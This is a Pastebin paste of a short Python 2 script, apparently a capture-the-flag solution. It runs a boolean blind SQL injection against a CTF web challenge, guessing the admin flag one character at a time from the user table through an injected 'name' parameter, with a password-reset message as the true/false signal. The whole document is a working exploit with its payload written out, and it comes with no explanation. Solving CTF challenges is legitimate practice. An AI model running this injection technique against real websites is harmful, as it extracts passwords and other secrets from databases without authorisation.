SHARE
TWEET

Untitled

mage_1868 Oct 24th, 2014 (edited) 43 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # coding: utf8
  2.  
  3. import urllib
  4. import urllib2
  5. import string
  6.  
  7. def blind(sql):
  8.     opener = urllib2.build_opener()
  9.     request = urllib2.Request('https://wildwildweb.fluxfingers.net:1424/?name=' + urllib2.quote(sql))
  10.     response = opener.open(request)
  11.     return 'A new password was generated and sent to your email address!' in response.read()
  12.  
  13. if __name__ == '__main__':
  14.     flag = ''
  15.  
  16.     while True:
  17.         find = False
  18.  
  19.         for c in '_$' + string.ascii_letters + string.digits:
  20.             test = flag + c.replace('_', r'\_')
  21.  
  22.             if blind("' != (select 1 from user where concat(name, passwd) like binary 'adminflag{" + test + "%}' limit 1)#") == True:
  23.                 print 'find: ' + flag + c
  24.                 flag = test
  25.                 find = True
  26.                 break
  27.  
  28.             print test
  29.  
  30.         if find == False:
  31.             break
  32.  
  33.     print flag
RAW Paste Data
Top